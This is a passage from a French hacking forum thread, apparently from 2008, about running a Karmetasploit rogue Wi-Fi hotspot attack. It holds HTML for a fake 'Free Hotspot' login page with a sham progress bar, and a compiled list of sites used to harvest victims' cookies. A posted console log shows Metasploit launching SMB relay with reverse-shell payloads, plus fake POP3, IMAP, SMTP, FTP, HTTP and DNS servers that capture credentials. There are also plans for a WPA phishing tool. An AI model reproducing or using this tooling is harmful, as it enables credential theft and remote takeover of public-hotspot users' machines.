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" />

<!-- Ce qu'on va mettre pour IE qui ne comprend pas l'encodation Base64-->
<div id="iefuck">Free</div>

<!-- La ligne du haut -->
<div id="texto">Activation de votre service Internet.</div></div>
<div id="texte">

<!-- Le premier message -->
<div id="un">
<div style="font-size:25px; font-weight:bold;">Bienvenue chez Free ! </div><br />
Free Hotspot est heureux de vous accueillir sur ses hotspots pour la première fois.<br />
Veuillez appuyer sur le bouton connexion pour activer votre service internet.
<br /><br /><a  href="#" onclick="javascript:connec();" id="connec">Connexion</a></div>

<!-- Le deuxième message -->
<div id="deux" style="display:none;">Free est actuellement en train d'assurer votre connexion au réseau Free Hotspot.


<!-- L'état, l'action en cours -->
<br /><br />État : <div id="etat">1%</div> <br /><br /><div id="useless" style="display:inline;">
 Action en cours : [ <div id="action">Préparation de la connexion...</div> ] </div><br /> <br /> 

<!-- Le bouton qui sera affiché à la fin de la fausse barre de chargement -->
<a href="#" onclick="javascript:activ();" id="activer" style="display:none;">Activer</a>

<!-- La fausse barre de chargement-->
<div id="a" align="left">
		
<div id="b">
			
<div id="c">
			</div>

</div>
</div>



</div>
</div>
</div>
<!-- La page de BSOD -->
<div id="bsodead">
Internal Server Error<br />
<br />
Error 500 :: Internal Server Error<br />
<br />
The server encountered an internal error or misconfiguration and was unable to complete your request.<br />
</div>

<script type="text/javascript">
<!--

if (tocook ==1) {
if (lit_cook("bsod")==1) {
activ();
}

}
-->
</script>


<div style="visibility:hidden">%CONTENT%</div>
</body>
</html>

Et maintenant, voilà comment configurer la page :
- Vitesse de la barre de progression

Recherchez ce code :

setTimeout("timedProg();",2000);

Et modifiez 2000 par le nombre de milli-secondes où la barre restera pour chaque pourcent.

Exemple :

setTimeout("timedProg();",1000);

Fera que la barre restera une seconde sur chaque pourcent.
Attention, la barre commence vers 50%, à cause du temps d'exécution du javascript (je n'ai pas trouvé de moyen pour parer cela...).
Donc avec 1 seconde pour chaque pourcent, et 50 pourcents à faire, la barre à peu près mettra 50 secondes à se charger.




- Cookies
J'ai ajouté un module qui permet de se souvenir du visiteur ;
c'est à dire, si le visiteur a déjà passé la barre de progression et a vu le message d'erreur/bsod, en rechargeant la page, il ne recommencera pas le formulaire de connexion et aura directement le message d'erreur + bsod. Vicieux nan ? big_smile

Pour activer cette fonction, recherchez :

var tocook=0;

Et remplacez 0 par 1.

Ce qui donne :

var tocook=1;

(encore un truc d'intello lol)


J'ai aussi préparé une petite archive pour télécharger directement le source + la version compressée

Fichier : html-karmatsploit.rar
Taille: 17.15 KB

Hébergeurs sans attente : 
http://www.filesavr.com/html-karmatsploit
http://www.hotshare.net/fr/file/97063-220925067f.html
http://dl.free.fr/getfile.pl?file=/c063FnL9


Hébergeurs avec attente :
http://rapidshare.com/files/165761709/html-karmatsploit.rar.html
http://www.megaupload.com/fr/?d=4LQZR6SD
http://www.filefactory.com/file/04540a/n/html-karmatsploit_rar
http://www.zshare.net/download/51612600dd6dc66f/
http://uploaded.to/?id=4z3z7r

Sans oublier :
--- Free et Windows sont des marques protégées, ces fichiers ne sont là que pour votre usage personnel et dans un but éducatif.
--- Tite-Live ou crack-wifi.com ne pourraient être tenu pour responsable des utilisations que vous en ferez.
--- Nah.

lol


V.I.S.T.A. : Virus, Infections, Spyware, Trojans, Adware.

Hors Ligne

#42 20-11-2008 23:04:18

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

En voila du joli travail!!!

Félicitations et un grand merci, c'est franchement nickel big_smile

En plus, en retravaillant la page on peut facilement remplacer le "Free Hotspot" affiché par ce qu'on veut, donc ça sera fonctionnel sur n'importe quel type de hotspot!

Moi je vous le dis, utiliser un hotspot ça craint de plus en plus de nos jours!

"Négociation avec le F.A.I." = L'aspiro à cookies vient de démarrer, veuillez avoir l'amabilité de patienter

"Échange des certificats NetDNS." = Grace à un fichier sites.txt copieusement chargé, un maximum d'infos seront récupérées

"Préparation aux échanges de paquets Windows Antispyware." = Transfert des cookies en cours, ça roule smile

"Ajout de ce Hotspot au centre Free." = Vous etes encore là??? Héhé lol

"Sécurisation de la connexion avec Windows Server." = Bon ben on va pas tarder à y aller, y'a pas écrit connexion à l'oeil non plus...

C'est tout de suite plus clair quand on traduit le langage technique...

Plus sérieusement, avec les attaques rogue ap et mitm, ça fait déja un bon moment qu'on vous dit que les hotspots peuvent etre très dangereux, et qu'ils n'offrent aucune sécurité, alors si un jour vous voyez la barre de chargement made by Tite-Live pendant que vous surfez au Mc Do ou ailleurs... On vous aura prévenu.

Hors Ligne

#43 22-11-2008 16:13:57

Tite-Live
Membre Indétronable
Inscription : 30-06-2008
Messages : 169

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Bon, je pensais qu'on aurait pu faire un fichier plus gros pour les sites les plus visités, mais... Alexa fait payer ses listes à un de ces prix... >.<

Choose a List

    * Top 10,000 Sites Price: $1,000

    * Top 25,000 Sites Price: [small]$2,500[/small]   $2,000

    * Top 50,000 Sites Price: [small]$5,000[/small]   $4,000

    * Top 100,000 Sites Price: [small]$10,000[/small]   $6,500


Begin Checkout

*Arg*

Et rien sur torrentfly (je rigole D: )

Bon, heureusement, il y a des concurrents.
Enfin.. des... j'ai juste trouvé  http://www.webpagefingerprint.com/ qui propose une liste des 20 000 sites les plus visités

En mélangeant les 100 sites les plus visités en langue française, en France, les 500 les plus visités dans le monde et les 20 000 de webpagefingerprint, puis en enlevant les doublons, je pense qu'on pourrait arriver à une bonne liste non ? big_smile


En parlant de social engineering, tu parlais de l'utiliser pour le Wpa, as-tu déjà fait un programme pour cela ?
[small](Peut-être devrait-on créer un nouveau topic pour parler de ça d'ailleurs non ?)[/small]
En tout cas, j'aimerais bien m'occuper des pages Html pour toutes les "Upgradations de firmware", et j'ai déjà fait du PyQT, donc on pourra même avoir une interface graphique pour ce prog lol

Tite-Live


V.I.S.T.A. : Virus, Infections, Spyware, Trojans, Adware.

Hors Ligne

#44 22-11-2008 18:05:17

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Et oui, les listes de topsites ont une valeur commerciale, et pas des moindres... Mais grace à ta recherche on a déja de quoi se mettre au boulot pour gonfler notre liste de sites. Merci wink Pour ce qui est du tool dédié au crack WPA par rogue AP, je vais créer un topic dès ce soir, ce sera notre base de travail big_smile

Hors Ligne

#45 11-12-2008 17:53:18

Tite-Live
Membre Indétronable
Inscription : 30-06-2008
Messages : 169

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Bon, j'ai fini de préparer le fichier avec la "grosse liste" de sites web.
donc il contient, comme prévu, dans cet ordre là :
* les 100 sites les plus visités en langue française [Alexa]
* les 100 sites les plus visités en France [Alexa]
* les 500 les plus visités dans le monde [Alexa]
* les 20 000 de webpagefingerprint

Les deux fichiers contiennent chacun 40 362 lignes, donc 20 181 sites ! Et aucun doublon smile

J'ai fait deux versions :

[1] Les sites sont classés dans cet ordre : un site en http://, le même en http://www. ...
Exemple :

-> Download <-
[small](Taille du fichier : ~ 1 Mo)[/small]

[2] Les sites sont classés dans cet ordre : tous les sites en http://, puis tous les sites en www.
Exemple :

-> Download <-
[small](Taille du fichier : ~ 1 Mo)[/small]

Pour ceux que ça intéresse : comment j'ai créé cette liste :
1] J'ai pris le code HTML des listes d'alexas. Donc je sélectionne la liste, et sous FF, click droit -> Code source de la sélection
2] J'utilise quelques regex pour ne garder que les sites
3] Je download les listes de Webpagefingerprint, et comme pour alexa, j'utilise quelques regex très simples smile
4] J'assemble les deux listes
5] J'enlève tous les http:// et http://www. (Rechercher/Remplacer, souvent c'est Ctrl+h)
6] On a donc un fichier de sites "pur". Voilà le mien
7] J'utilise awk pour ajouter des http:// et des http://www. à chaque site :
* On crée un fichier list.awk qui contient ça :

{
OFS=""
print "http://",$0
print "http://www.",$0
}

* On lance dans un shell awk -f list.awk CompletList.txt pour vérifier si ça marche bien, puis on met tout dans un fichier avec awk -f list.awk CompletList.txt > Liste_Sites.txt
8] On enlève les doublons : awk '{if (x[$0] != "") next ; print $0 ; x[$0]=$0}' < Liste_Sites.txt > Liste_Sites_Propre.txt

Et voilà smile


Tite-Live


V.I.S.T.A. : Virus, Infections, Spyware, Trojans, Adware.

Hors Ligne

#46 11-12-2008 20:35:25

Grand Hibou
Membre d'honneur
Inscription : 08-06-2008
Messages : 1 280

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Beau travail!
merçi à toi!  smile


Un virus est un programme nocif.
Il est petit, rapide, prend peu de place en mémoire et sait se faire discret.

Windows n'est donc pas un virus, c'est un bug!

Hors Ligne

#47 12-12-2008 18:20:57

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Wow, bravo Tite-Live, en voila une belle liste de sites bien garnie smile

Mais est ce que tu l'as testée? Je me pose une petite question: combien de temps met karmetasploit à aspirer les cookies de tous ces sites? Ca doit prendre un petit moment je pense, car il y a tout de meme 20681 noms de domaine, et donc autant de requetes que karmetasploit devra envoyer au client!

Hors Ligne

#48 22-12-2008 13:23:23

sardineeMule
Membre Irremplaçable
Inscription : 05-12-2008
Messages : 1 139
Site Web

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Salut a tous,
J'ai tenté a plusieur reprise la création de la rogue ,j'ai bien remplacer les 2 wlan par ma carte j'ai donc mis "wifi0". Mais le nouveau AP n'apparait pas.
La 1ere partie du script s'execute je pense normalement et la 2eme partie aussi

bt ~ # ok1.sh
dhcpd: no process killed
tcpdump: no process killed
airbase-ng: no process killed


Interface       Chipset         Driver

wifi0           Atheros         madwifi-ng
ath0            Atheros         madwifi-ng VAP (parent: wifi0)
ath1            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

13:08:33  Created tap interface at0
13:08:33  Trying to set MTU on at0 to 1500
13:08:33  Trying to set MTU on wifi0 to 1800
13:08:33  Access Point with BSSID 00:1C:F0:9A:BA:4D started.

Et voila la copie de la 2eme partie:

bt ~ # ok2.sh
Internet Systems Consortium DHCP Server V3.0.6
Copyright 2004-2007 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Wrote 0 leases to leases file.
Listening on LPF/at0/00:1c:f0:9a:ba:4d/10.0.0/24
Sending on   LPF/at0/00:1c:f0:9a:ba:4d/10.0.0/24
Sending on   Socket/fallback/fallback-net

                     888                           888        d8b888
                     888                           888        Y8P888
                     888                           888           888
88888b.d88b.  .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 "888 "88bd8P  Y8b888       "88b88K     888 "88b888d88""88b888888
888  888  88888888888888   .d888888"Y8888b.888  888888888  888888888
888  888  888Y8b.    Y88b. 888  888     X88888 d88P888Y88..88P888Y88b.
888  888  888 "Y8888  "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888
                                           888
                                           888
                                           888


       =[ msf v3.3-dev
+ -- --=[ 294 exploits - 124 payloads
+ -- --=[ 17 encoders - 6 nops
       =[ 58 aux

resource> load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
resource> db_create /root/karma.db
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/karma.db
resource> use exploit/windows/smb/smb_relay
resource> set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
resource> set LHOST 10.0.0.1
LHOST => 10.0.0.1
resource> set SRVPORT 139
SRVPORT => 139
resource> set LPORT 1390
LPORT => 1390
resource> exploit
[*] Exploit running as background job.
resource> use exploit/windows/smb/smb_relay
resource> set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
resource> set LHOST 10.0.0.1
LHOST => 10.0.0.1
resource> set SRVPORT 445
SRVPORT => 445
resource> set LPORT 4450
LPORT => 4450
resource> exploit
[*] Exploit running as background job.
resource> use auxiliary/server/capture/pop3
resource> set SRVPORT 110
SRVPORT => 110
resource> set SSL false
SSL => false
resource> run
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/pop3
resource> set SRVPORT 995
SRVPORT => 995
resource> set SSL true
SSL => true
resource> run
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/ftp
resource> run
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/imap
resource> set SSL false
SSL => false
resource> set SRVPORT 143
SRVPORT => 143
resource> run
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/imap
resource> set SSL true
SSL => true
resource> set SRVPORT 993
SRVPORT => 993
resource> run
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/smtp
resource> set SSL false
SSL => false
resource> set SRVPORT 25
SRVPORT => 25
resource> run
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/smtp
resource> set SSL true
SSL => true
resource> set SRVPORT 465
SRVPORT => 465
resource> run
[*] Auxiliary module running as background job
resource> use auxiliary/server/fakedns
resource> run
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 80
SRVPORT => 80
resource> set BGIMAGE /msf3/load.gif
BGIMAGE => /msf3/load.gif
resource> set SSL false
SSL => false
resource> run
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 8080
[*] Handler binding to LHOST 10.0.0.1
SRVPORT => 8080
[*] Handler binding to LHOST 10.0.0.1
[*] Started reverse handler
resource> set BGIMAGE /msf3/load.gif
[*] Started reverse handler
BGIMAGE => /msf3/load.gif
[*] Server started.
[*] Server started.
[*] Server started.
[*] Server started.
[*] Server started.
[*] Server started.
[*] Server started.
resource> set SSL false
[*] Server started.
[*] Server started.
[*] Server started.
SSL => false
resource> run
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 443
SRVPORT => 443
resource> set BGIMAGE /msf3/load.gif
BGIMAGE => /msf3/load.gif
resource> set SSL true
SSL => true
resource> run
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 8443
SRVPORT => 8443
resource> set BGIMAGE /msf3/load.gif
BGIMAGE => /msf3/load.gif
resource> set SSL true
SSL => true
resource> run
[*] Auxiliary module running as background job
msf auxiliary(http) >
[*] Server started.
[*] Server started.
[*] Server started.

Voila si quelqu'un a une idée d'ou vien ;l'erreur si il y en a une merci.


title.jpg N'oubliez pas le site http://www.crack-wifi.com/
  nux  hight.jpg

Hors Ligne

#49 22-12-2008 21:13:57

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Ok, donc c'est le lancement d'airbase-ng qui ne fonctionne pas d'après ce que je comprend. Quand tu lances airbase-ng, tu ne dois pas utiliser wifi0 mais ath1 qui est ton inteface en mode monitor, et là ça devrait rouler wink

Hors Ligne

#50 23-12-2008 12:56:18

sardineeMule
Membre Irremplaçable
Inscription : 05-12-2008
Messages : 1 139
Site Web

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

merci M1ck3y avec ath1 sa marche.
Par contre sur un 2eme pc je l'AP apparit une fois sur deux , et plus encore pourquoi mon faut AP apparait et en plus j'ai un clone de ma freebox en AP qui apparait aussi .


title.jpg N'oubliez pas le site http://www.crack-wifi.com/
  nux  hight.jpg

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.049 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]